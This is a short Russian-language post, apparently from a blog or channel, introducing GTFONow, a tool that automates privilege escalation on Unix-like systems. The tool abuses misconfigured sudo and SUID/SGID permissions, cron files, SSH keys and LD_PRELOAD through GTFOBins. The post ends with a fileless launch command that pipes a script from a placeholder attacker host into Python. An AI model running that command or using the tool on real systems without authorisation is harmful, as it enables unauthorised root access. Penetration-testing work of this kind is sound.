Сегодня поговорим об инструменте GTFONow.
Данный инструмент предназначен для автоматической эскалации привилегий в Unix‑подобных системах через команду sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.
Основные особенности:
Автоматическая эксплуатация неправильно настроенных разрешений sudo.
Автоматическая эксплуатация неправильно настроенных разрешений suid, sgid.
Автоматическая эксплуатация неправильных настроенных компонентов ОС.
Автоматическая эксплуатация через SSH‑ключи.
Автоматическая эксплуатация через файл используемый в cron.
Автоматическая эксплуатация через переменную окружения LD_PRELOAD.
Легкий запуск без файлов с помощью
curl http://attackerhost/gtfonow.py | python